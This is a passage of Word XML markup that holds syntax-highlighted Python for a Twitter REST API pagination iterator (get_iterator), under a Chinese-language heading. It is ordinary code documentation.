          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'message'</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time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C008D8C" w14:textId="77777777" w:rsidR="00D4181E" w:rsidRPr="002C5769" w:rsidRDefault="00D4181E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6923E5" w14:textId="06EEC7D3" w:rsidR="009D7568" w:rsidRDefault="003057B0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>_iterator()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397927E" w14:textId="77777777" w:rsidR="00C7094E" w:rsidRDefault="00C7094E" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_iterator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>new_tweets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"""Iterate response from Twitter REST API resource. Resource is called</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    in a loop to retrieve consecutive pages of results.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    :param wait: Floating point number (default=5) of seconds wait between requests.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                 Depending on the resource, appropriate values are 5 or 60 seconds.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    :param new_tweets: Boolean determining the search direction.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                       False (default) retrieves old results.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                       True retrieves current results.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    :returns: JSON objects containing statuses, errors or other return info.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="7F8591"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">elapsed </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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>while True</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>try</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># REQUEST ONE PAGE OF RESULTS...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>start = time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</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r = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.api.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.resource, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.params, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hydrate_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.hydrate_type)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            it = r.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_iterator</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>new_tweets</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it = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reversed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(it))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># YIELD FOR EACH ITEM IN THE PAGE...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">item_count = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                item_count += </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(item) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dict</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'id' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                        id = item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'id'</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'code' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item:</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
